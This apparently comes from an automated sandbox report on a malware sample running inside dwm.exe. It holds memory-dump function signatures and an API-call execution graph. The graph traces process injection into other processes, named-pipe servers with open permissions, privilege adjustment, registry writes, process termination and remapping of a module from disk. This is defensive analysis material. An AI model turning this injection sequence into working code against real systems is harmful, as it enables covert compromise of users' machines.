                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: ed7044a59e46063c6cedcc0fa70a4cb5f9e38caaa5c3ad2d4ddba7fa5267c18f
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: AA51BD32B017009AEB64CF65E84CB5937B6F344B98F248534EA8F47788DB35C981CB22
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: eede53fd5bf1c617aa0365c69d83f6964c9c5141aef9ea52c6707d0781c4fd97
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 85F0443230464292E7709B21F8987597770F758B88FA44034DA8D8AD55DF3CC64DCB11
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 677d836a365569318be48d7dc26c03b707c4fd806aa4b64e320e2f65dfdf5f96
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 32F08220304B8192EAA48F53B91C2197370AB88FD0F248031EE8A47F18DF3CC445C7A1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: ffa703ce45f9f47f93a2fd77227258ce1f52bea2fd7e0728689e18b643c996d3
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: B3F0966135170591EB708B24F84C35A7330EB847A1F640229CAEE46AE4CF3DC544C371
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction ID: 2e5659b599159111f5a82bbfe3fa8239b5a03c6f8e81b61fa4bdca3449316732
                                                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction Fuzzy Hash: A0619636519B84C6EB60DB15F54831ABBB0F388794F201516EACE47BA8DB7CC954CF12
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: af7a10fbcdd35d25a0eedde17d056fd84300e72477245582d1813680f258cf9a
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 92115122AD0A5131F7F45568E65E36533F16B683B8F380A28A9F606ED68B24C941C232
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 8a0b107e24b1548139f2e99b5c7c3efda6f15ee66b1dc4c44c5584c7e3cbcf73
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: A611CA72612E5152FA64152CE4CD36933A06B58374FB8473AA9FEC63D6CB24C841C232
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 8275968d12326c96308ad6d1f800c51956b246ff52fd5645692c1f8a32ad9f62
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 29619E2260064042FA679B79E54C3AA7BF1E7C17C8F705415DADE477E4DB34C946C222
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 17bb476466e3ff4f04a85ec908232aadd8a646a24b2af8f35efcc5f76b9c8b99
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 3B617937A00B848AEB20DFA5D48479D77B0F748B88F244216EF8E1BB98DB38D595C711
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e59089bba677d222a3ff6305b6a95a49dbcb197b1d356d863ec01ed1e03d3b10
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: C4519F762043808AEB74CF25959835D77B0F794B89F289216EADD8FBD5CB38D490CB12
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 23aca5113cd6646f5191f7d0f29d6b2863c202459108ff2c2bc3649bdf9ec196
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: FD516C32100380CAEB768FB5955835977B0F395BD4F289216EADE8BBD5CB38D491CB12
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 33ee84f3d2e35e2eb260c96c6a9f41b19c8e49cab8daa237f789fbd62d683701
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: B451D63A7216008BDB96CB25D448F2937B5F394BD8F718125DA8E63748EBB4E841C726
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 983ef2cb673edadab5a5c8751c99234bdd523c64c97835a6c5c175e4b82085e2
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: AE31BF36211740DAE796DF21E848B2937B5F380BD8F258018EE9F57788DB38E941C726
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 0cfbe3989ad51b6503d5e2804fa8513af81f4b4ee7e02c74761ffe8a52e4bf6f
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: E4D1C032B14A80A9E761CFB9D44839C3BB1F3587A8F248216DE9D97F9ADB34C506C351
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 1e86a15e4ee639612e1e838b532126df22f3cbbb115fb5d08622a82986b655b6
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: D2118B36540B92EAE7A4DF62A80824977B0F78CF81F284035EA8D03F16DF38C054C751
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 4807b2611076f96943862d161e056cdd6436f4ff96b8a97d2ae52b867fc3dd30
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 2891C432740650A5FBF0DF6994883AD3BF4B758B88F744109DE8A67E86DB34C486C722
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 3f5f6fd16ddd14ed0e1bb1819c72d6881c103777ea279e037482266a28d62027
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: E2115E26B50F019AEF50CF60E8583A833B4F719758F540E35DAAD46BA8DF78C298C391
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 937e72dd8e6d345f089c8e2313df90b66dad40338bf09b86f9c15cb5c94cb251
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: E671C23660078186EB74DF29D8483AA77B4F389B84FA50026DE8E57F89DF35C645C712
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 363db27806a8208c57939334ef9cec9730f8f839637735c7e8f31fbceec634d5
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: DC615333A01A848AEB22DF65D48439D77B0F398BC8F248216EF8D17B98DB38D195C711
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 9a98f76d43b1946ffa988f3be5de7d8b23f197965298065719e08abfb02428c5
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: ED51243220438196EA78CF2DA05C3AABBB1F395780F650125DECE03B89DB3AC504C762
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 9f878c62cf4b7bea1f65f453db809c2fc137e0a7b7cd26cf74e1801bed0496c8
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: EC41D532714B8096DB70CF69E8483A977B0F798794F644021EE8D87B98EB7CC545C761
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: b2c0425ecf9cb7ccc282c22f606d908f3bcba3e897ed7f9796a669c9dbd0fbc2
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: D711F836614B8082EB61CB15E448359B7E5FB88B94F684225EECD07B69DF3CC555CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 80d0714f7356b10da1b5c47540756507ab6a4aff8d62ac4a436c721598fc27c5
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2BE08661641B44D1DF029F21E88429833B0DB98B64B989122D99C46351FB38D1E9C311
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: fd39a01d5779ee7db575262003db31ec3d3ee27b08c58c4554370aa0ecd2c365
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: A1E0C261A01B48C5DF029F31E88029873B0EBA8B64F98D123CE8C47351FB38D1E9C311
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 971d5e98438810f3fd65c55ecbdf4f3b11b29921933e4b78099080cbc9bec214
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 4811AC25601B9581EA54DF6BA80C32AB7B1FB89FD0F288128DE8D43B66DF39C442C311
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 4716464f79ddb8eb708ebf8df0892cbc7baf360fe0a5473338bdaf4dc5786430
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: C0E06D3564160686EB548F62D80C34A37F1FB8DF06F14C024C98D07B52DF7D8499C761

                                                        Execution Graph

                                                        Execution Coverage: 48.5%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 226
                                                        Total number of Limit Nodes: 22
                                                        execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 
439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 
492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap 